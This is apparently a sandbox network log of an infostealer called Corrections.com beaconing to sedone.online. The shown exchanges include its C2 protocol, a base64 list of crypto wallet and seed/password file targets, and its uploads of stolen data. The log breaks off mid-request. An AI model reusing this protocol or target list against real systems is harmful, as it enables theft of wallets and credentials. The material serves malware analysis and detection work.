2024-12-15 19:48:16 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sun, 15 Dec 2024 19:48:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.4	49803	116.203.12.241	443	5496	C:\Users\user\AppData\Local\Temp\628056\Corrections.com

Timestamp	Bytes transferred	Direction	Data
2024-12-15 19:48:10 UTC	325	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----26XB16PZUA1VAASJ5PHV User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: sedone.online Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-12-15 19:48:10 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 32 36 58 42 31 36 50 5a 55 41 31 56 41 41 53 4a 35 50 48 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 36 65 33 30 36 38 66 63 61 35 39 35 39 61 33 39 63 36 61 39 32 37 65 37 37 66 61 31 61 65 32 0d 0a 2d 2d 2d 2d 2d 2d 32 36 58 42 31 36 50 5a 55 41 31 56 41 41 53 4a 35 50 48 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 36 30 30 30 39 64 64 38 37 35 37 66 63 34 63 37 61 36 35 64 63 65 65 66 32 39 35 66 36 65 30 0d 0a 2d 2d 2d 2d 2d 2d 32 36 58 42 31 36 50 5a 55 41 31 56 41 41 53 4a 35 50 48 56 0d 0a 43 6f 6e 74 Data Ascii: ------26XB16PZUA1VAASJ5PHVContent-Disposition: form-data; name="token"f6e3068fca5959a39c6a927e77fa1ae2------26XB16PZUA1VAASJ5PHVContent-Disposition: form-data; name="build_id"960009dd8757fc4c7a65dceef295f6e0------26XB16PZUA1VAASJ5PHVCont
2024-12-15 19:48:11 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sun, 15 Dec 2024 19:48:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-15 19:48:11 UTC	2228	IN	Data Raw: 38 61 38 0d 0a 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47 Data Ascii: 8a8Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZG

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.4	49809	116.203.12.241	443	5496	C:\Users\user\AppData\Local\Temp\628056\Corrections.com

Timestamp	Bytes transferred	Direction	Data
2024-12-15 19:48:13 UTC	325	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----YM7YMOHLXBIEUAIMOP89 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: sedone.online Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-12-15 19:48:13 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 59 4d 37 59 4d 4f 48 4c 58 42 49 45 55 41 49 4d 4f 50 38 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 36 65 33 30 36 38 66 63 61 35 39 35 39 61 33 39 63 36 61 39 32 37 65 37 37 66 61 31 61 65 32 0d 0a 2d 2d 2d 2d 2d 2d 59 4d 37 59 4d 4f 48 4c 58 42 49 45 55 41 49 4d 4f 50 38 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 36 30 30 30 39 64 64 38 37 35 37 66 63 34 63 37 61 36 35 64 63 65 65 66 32 39 35 66 36 65 30 0d 0a 2d 2d 2d 2d 2d 2d 59 4d 37 59 4d 4f 48 4c 58 42 49 45 55 41 49 4d 4f 50 38 39 0d 0a 43 6f 6e 74 Data Ascii: ------YM7YMOHLXBIEUAIMOP89Content-Disposition: form-data; name="token"f6e3068fca5959a39c6a927e77fa1ae2------YM7YMOHLXBIEUAIMOP89Content-Disposition: form-data; name="build_id"960009dd8757fc4c7a65dceef295f6e0------YM7YMOHLXBIEUAIMOP89Cont
2024-12-15 19:48:14 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sun, 15 Dec 2024 19:48:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-15 19:48:14 UTC	2208	IN	Data Raw: 38 39 34 0d 0a 52 47 56 7a 61 33 52 76 63 48 77 6c 52 45 56 54 53 31 52 50 55 43 56 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 69 6f 73 4b 6e 4e 6c 5a 57 51 71 4c 69 6f 73 4b 6d 4a 30 59 79 6f 75 4b 69 77 71 61 32 56 35 4b 69 34 71 4c 43 6f 79 5a 6d 45 71 4c 69 6f 73 4b 6d 4e 79 65 58 42 30 62 79 6f 75 4b 69 77 71 59 32 39 70 62 69 6f 75 4b 69 77 71 63 48 4a 70 64 6d 46 30 5a 53 6f 75 4b 69 77 71 4d 6d 5a 68 4b 69 34 71 4c 43 70 68 64 58 52 6f 4b 69 34 71 4c 43 70 73 5a 57 52 6e 5a 58 49 71 4c 69 6f 73 4b 6e 52 79 5a 58 70 76 63 69 6f 75 4b 69 77 71 63 47 46 7a 63 79 6f 75 4b 69 77 71 64 32 46 73 4b 69 34 71 4c 43 70 31 63 47 4a 70 64 43 6f 75 4b 69 77 71 59 6d 4e 6c 65 43 6f 75 4b 69 77 71 59 6d 6c 30 61 47 6c 74 59 69 6f 75 4b 69 77 71 61 47 6c 30 59 6e Data Ascii: 894RGVza3RvcHwlREVTS1RPUCVcfCp3YWxsZXQqLiosKnNlZWQqLiosKmJ0YyouKiwqa2V5Ki4qLCoyZmEqLiosKmNyeXB0byouKiwqY29pbiouKiwqcHJpdmF0ZSouKiwqMmZhKi4qLCphdXRoKi4qLCpsZWRnZXIqLiosKnRyZXpvciouKiwqcGFzcyouKiwqd2FsKi4qLCp1cGJpdCouKiwqYmNleCouKiwqYml0aGltYiouKiwqaGl0Yn

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.4	49835	116.203.12.241	443	5496	C:\Users\user\AppData\Local\Temp\628056\Corrections.com

Timestamp	Bytes transferred	Direction	Data
2024-12-15 19:48:25 UTC	327	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----6FUKNYC2NGV3E3OH4ECJ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: sedone.online Content-Length: 32481 Connection: Keep-Alive Cache-Control: no-cache
2024-12-15 19:48:25 UTC	16355	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 36 46 55 4b 4e 59 43 32 4e 47 56 33 45 33 4f 48 34 45 43 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 36 65 33 30 36 38 66 63 61 35 39 35 39 61 33 39 63 36 61 39 32 37 65 37 37 66 61 31 61 65 32 0d 0a 2d 2d 2d 2d 2d 2d 36 46 55 4b 4e 59 43 32 4e 47 56 33 45 33 4f 48 34 45 43 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 36 30 30 30 39 64 64 38 37 35 37 66 63 34 63 37 61 36 35 64 63 65 65 66 32 39 35 66 36 65 30 0d 0a 2d 2d 2d 2d 2d 2d 36 46 55 4b 4e 59 43 32 4e 47 56 33 45 33 4f 48 34 45 43 4a 0d 0a 43 6f 6e 74 Data Ascii: ------6FUKNYC2NGV3E3OH4ECJContent-Disposition: form-data; name="token"f6e3068fca5959a39c6a927e77fa1ae2------6FUKNYC2NGV3E3OH4ECJContent-Disposition: form-data; name="build_id"960009dd8757fc4c7a65dceef295f6e0------6FUKNYC2NGV3E3OH4ECJCont
2024-12-15 19:48:25 UTC	16126	OUT	Data Raw: 46 73 61 58 70 6c 51 32 46 73 62 47 4a 68 59 32 74 42 63 6e 4a 68 65 51 41 41 56 51 42 58 5a 48 4e 54 5a 58 52 31 63 45 78 76 5a 30 31 6c 63 33 4e 68 5a 32 56 58 41 46 59 41 56 32 52 7a 55 33 56 69 63 32 4e 79 61 57 4a 6c 52 58 67 41 41 41 4d 41 51 32 39 75 63 33 52 79 64 57 4e 30 55 47 46 79 64 47 6c 68 62 45 31 7a 5a 31 5a 58 41 41 51 41 51 33 56 79 63 6d 56 75 64 45 6c 51 41 46 64 45 55 30 4e 50 55 6b 55 75 5a 47 78 73 41 47 34 45 55 6e 52 73 53 57 35 70 64 46 56 75 61 57 4e 76 5a 47 56 54 64 48 4a 70 62 6d 63 41 41 4a 38 42 54 6e 52 50 63 47 56 75 52 6d 6c 73 5a 51 41 41 62 6e 52 6b 62 47 77 75 5a 47 78 73 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: FsaXplQ2FsbGJhY2tBcnJheQAAVQBXZHNTZXR1cExvZ01lc3NhZ2VXAFYAV2RzU3Vic2NyaWJlRXgAAAMAQ29uc3RydWN0UGFydGlhbE1zZ1ZXAAQAQ3VycmVudElQAFdEU0NPUkUuZGxsAG4EUnRsSW5pdFVuaWNvZGVTdHJpbmcAAJ8BTnRPcGVuRmlsZQAAbnRkbGwuZGxsAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-15 19:48:26 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sun, 15 Dec 2024 19:48:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-15 19:48:26 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.4	49841	116.203.12.241	443	5496	C:\Users\user\AppData\Local\Temp\628056\Corrections.com

Timestamp	Bytes transferred	Direction	Data
2024-12-15 19:48:26 UTC	326	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----0ZC2DBS0R1NYU3WT0HLN User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: sedone.online Content-Length: 4421 Connection: Keep-Alive Cache-Control: no-cache
2024-12-15 19:48:26 UTC	4421	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 30 5a 43 32 44 42 53 30 52 31 4e 59 55 33 57 54 30 48 4c 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 36 65 33 30 36 38 66 63 61 35 39 35 39 61 33 39 63 36 61 39 32 37 65 37 37 66 61 31 61 65 32 0d 0a 2d 2d 2d 2d 2d 2d 30 5a 43 32 44 42 53 30 52 31 4e 59 55 33 57 54 30 48 4c 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 36 30 30 30 39 64 64 38 37 35 37 66 63 34 63 37 61 36 35 64 63 65 65 66 32 39 35 66 36 65 30 0d 0a 2d 2d 2d 2d 2d 2d 30 5a 43 32 44 42 53 30 52 31 4e 59 55 33 57 54 30 48 4c 4e 0d 0a 43 6f 6e 74 Data Ascii: ------0ZC2DBS0R1NYU3WT0HLNContent-Disposition: form-data; name="token"f6e3068fca5959a39c6a927e77fa1ae2------0ZC2DBS0R1NYU3WT0HLNContent-Disposition: form-data; name="build_id"960009dd8757fc4c7a65dceef295f6e0------0ZC2DBS0R1NYU3WT0HLNCont
2024-12-15 19:48:27 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sun, 15 Dec 2024 19:48:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-15 19:48:27 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.4	49843	116.203.12.241	443	5496	C:\Users\user\AppData\Local\Temp\628056\Corrections.com

Timestamp	Bytes transferred	Direction	Data
2024-12-15 19:48:28 UTC	326	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----8Q9RQQQQ1DJMYU379R16 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: sedone.online Content-Length: 4421 Connection: Keep-Alive Cache-Control: no-cache
2024-12-15 19:48:28 UTC	4421	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 38 51 39 52 51 51 51 51 31 44 4a 4d 59 55 33 37 39 52 31 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 36 65 33 30 36 38 66 63 61 35 39 35 39 61 33 39 63 36 61 39 32 37 65 37 37 66 61 31 61 65 32 0d 0a 2d 2d 2d 2d 2d 2d 38 51 39 52 51 51 51 51 31 44 4a 4d 59 55 33 37 39 52 31 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 36 30 30 30 39 64 64 38 37 35 37 66 63 34 63 37 61 36 35 64 63 65 65 66 32 39 35 66 36 65 30 0d 0a 2d 2d 2d 2d 2d 2d 38 51 39 52 51 51 51 51 31 44 4a 4d 59 55 33 37 39 52 31 36 0d 0a 43 6f 6e 74 Data Ascii: ------8Q9RQQQQ1DJMYU379R16Content-Disposition: form-data; name="token"f6e3068fca5959a39c6a927e77fa1ae2------8Q9RQQQQ1DJMYU379R16Content-Disposition: form-data; name="build_id"960009dd8757fc4c7a65dceef295f6e0------8Q9RQQQQ1DJMYU379R16Cont
2024-12-15 19:48:29 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sun, 15 Dec 2024 19:48:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-15 19:48:29 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.4	49848	116.203.12.241	443	5496	C:\Users\user\AppData\Local\Temp\628056\Corrections.com

Timestamp	Bytes transferred	Direction	Data
2024-12-15 19:48:29 UTC	326	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----47YMOHDTJW4EUAAA1VKF User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: sedone.online Content-Length: 6533 Connection: Keep-Alive Cache-Control: no-cache
2024-12-15 19:48:29 UTC	6533	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 34 37 59 4d 4f 48 44 54 4a 57 34 45 55 41 41 41 31 56 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 36 65 33 30 36 38 66 63 61 35 39 35 39 61 33 39 63 36 61 39 32 37 65 37 37 66 61 31 61 65 32 0d 0a 2d 2d 2d 2d 2d 2d 34 37 59 4d 4f 48 44 54 4a 57 34 45 55 41 41 41 31 56 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 36 30 30 30 39 64 64 38 37 35 37 66 63 34 63 37 61 36 35 64 63 65 65 66 32 39 35 66 36 65 30 0d 0a 2d 2d 2d 2d 2d 2d 34 37 59 4d 4f 48 44 54 4a 57 34 45 55 41 41 41 31 56 4b 46 0d 0a 43 6f 6e 74 Data Ascii: ------47YMOHDTJW4EUAAA1VKFContent-Disposition: form-data; name="token"f6e3068fca5959a39c6a927e77fa1ae2------47YMOHDTJW4EUAAA1VKFContent-Disposition: form-data; name="build_id"960009dd8757fc4c7a65dceef295f6e0------47YMOHDTJW4EUAAA1VKFCont
2024-12-15 19:48:30 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sun, 15 Dec 2024 19:48:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-15 19:48:30 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.4	49854	116.203.12.241	443	5496	C:\Users\user\AppData\Local\Temp\628056\Corrections.com

Timestamp	Bytes transferred	Direction	Data
2024-12-15 19:48:31 UTC	326	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----8Q9RQQQQ1DJMYU379R16 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: sedone.online Content-Length: 6561 Connection: Keep-Alive Cache-Control: no-cache
2024-12-15 19:48:31 UTC	6561	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 38 51 39 52 51 51 51 51 31 44 4a 4d 59 55 33 37 39 52 31 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 36 65 33 30 36 38 66 63 61 35 39 35 39 61 33 39 63 36 61 39 32 37 65 37 37 66 61 31 61 65 32 0d 0a 2d 2d 2d 2d 2d 2d 38 51 39 52 51 51 51 51 31 44 4a 4d 59 55 33 37 39 52 31 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 36 30 30 30 39 64 64 38 37 35 37 66 63 34 63 37 61 36 35 64 63 65 65 66 32 39 35 66 36 65 30 0d 0a 2d 2d 2d 2d 2d 2d 38 51 39 52 51 51 51 51 31 44 4a 4d 59 55 33 37 39 52 31 36 0d 0a 43 6f 6e 74 Data Ascii: ------8Q9RQQQQ1DJMYU379R16Content-Disposition: form-data; name="token"f6e3068fca5959a39c6a927e77fa1ae2------8Q9RQQQQ1DJMYU379R16Content-Disposition: form-data; name="build_id"960009dd8757fc4c7a65dceef295f6e0------8Q9RQQQQ1DJMYU379R16Cont
2024-12-15 19:48:32 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sun, 15 Dec 2024 19:48:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-15 19:48:32 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.4	49856	116.203.12.241	443	5496	C:\Users\user\AppData\Local\Temp\628056\Corrections.com

Timestamp	Bytes transferred	Direction	Data
2024-12-15 19:48:32 UTC	327	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----Q1N7GVSR9H47QQ1V3WLN User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: sedone.online Content-Length: 11445 Connection: Keep-Alive Cache-Control: no-cache
2024-12-15 19:48:32 UTC	11445	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 51 31 4e 37 47 56 53 52 39 48 34 37 51 51 31 56 33 57 4c 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 36 65 33 30 36 38 66 63 61 35 39 35 39 61 33 39 63 36 61 39 32 37 65 37 37 66 61 31 61 65 32 0d 0a 2d 2d 2d 2d 2d 2d 51 31 4e 37 47 56 53 52 39 48 34 37 51 51 31 56 33 57 4c 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 36 30 30 30 39 64 64 38 37 35 37 66 63 34 63 37 61 36 35 64 63 65 65 66 32 39 35 66 36 65 30 0d 0a 2d 2d 2d 2d 2d 2d 51 31 4e 37 47 56 53 52 39 48 34 37 51 51 31 56 33 57 4c 4e 0d 0a 43 6f 6e 74 Data Ascii: ------Q1N7GVSR9H47QQ1V3WLNContent-Disposition: form-data; name="token"f6e3068fca5959a39c6a927e77fa1ae2------Q1N7GVSR9H47QQ1V3WLNContent-Disposition: form-data; name="build_id"960009dd8757fc4c7a65dceef295f6e0------Q1N7GVSR9H47QQ1V3WLNCont
2024-12-15 19:48:33 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sun, 15 Dec 2024 19:48:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-15 19:48:33 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.4	49862	116.203.12.241	443	5496	C:\Users\user\AppData\Local\Temp\628056\Corrections.com

Timestamp	Bytes transferred	Direction	Data
2024-12-15 19:48:34 UTC	327	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----Q1NGDT0R9H4EU37QIMYM User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: sedone.online Content-Length: 14153 Connection: Keep-Alive Cache-Control: no-cache
2024-12-15 19:48:34 UTC	14153	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 51 31 4e 47 44 54 30 52 39 48 34 45 55 33 37 51 49 4d 59 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 36 65 33 30 36 38 66 63 61 35 39 35 39 61 33 39 63 36 61 39 32 37 65 37 37 66 61 31 61 65 32 0d 0a 2d 2d 2d 2d 2d 2d 51 31 4e 47 44 54 30 52 39 48 34 45 55 33 37 51 49 4d 59 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 36 30 30 30 39 64 64 38 37 35 37 66 63 34 63 37 61 36 35 64 63 65 65 66 32 39 35 66 36 65 30 0d 0a 2d 2d 2d 2d 2d 2d 51 31 4e 47 44 54 30 52 39 48 34 45 55 33 37 51 49 4d 59 4d 0d 0a 43 6f 6e 74 Data Ascii: ------Q1NGDT0R9H4EU37QIMYMContent-Disposition: form-data; name="token"f6e3068fca5959a39c6a927e77fa1ae2------Q1NGDT0R9H4EU37QIMYMContent-Disposition: form-data; name="build_id"960009dd8757fc4c7a65dceef295f6e0------Q1NGDT0R9H4EU37QIMYMCont
2024-12-15 19:48:35 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sun, 15 Dec 2024 19:48:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-15 19:48:35 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.4	49867	116.203.12.241	443	5496	C:\Users\user\AppData\Local\Temp\628056\Corrections.com

Timestamp	Bytes transferred	Direction	Data
2024-12-15 19:48:35 UTC	326	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----RIWTJEUKXLN7QIMYUSJM User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: sedone.online Content-Length: 4277 Connection: Keep-Alive Cache-Control: no-cache
2024-12-15 19:48:35 UTC	4277	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 52 49 57 54 4a 45 55 4b 58 4c 4e 37 51 49 4d 59 55 53 4a 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 36 65 33 30 36 38 66 63 61 35 39 35 39 61 33 39 63 36 61 39 32 37 65 37 37 66 61 31 61 65 32 0d 0a 2d 2d 2d 2d 2d 2d 52 49 57 54 4a 45 55 4b 58 4c 4e 37 51 49 4d 59 55 53 4a 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 36 30 30 30 39 64 64 38 37 35 37 66 63 34 63 37 61 36 35 64 63 65 65 66 32 39 35 66 36 65 30 0d 0a 2d 2d 2d 2d 2d 2d 52 49 57 54 4a 45 55 4b 58 4c 4e 37 51 49 4d 59 55 53 4a 4d 0d 0a 43 6f 6e 74 Data Ascii: ------RIWTJEUKXLN7QIMYUSJMContent-Disposition: form-data; 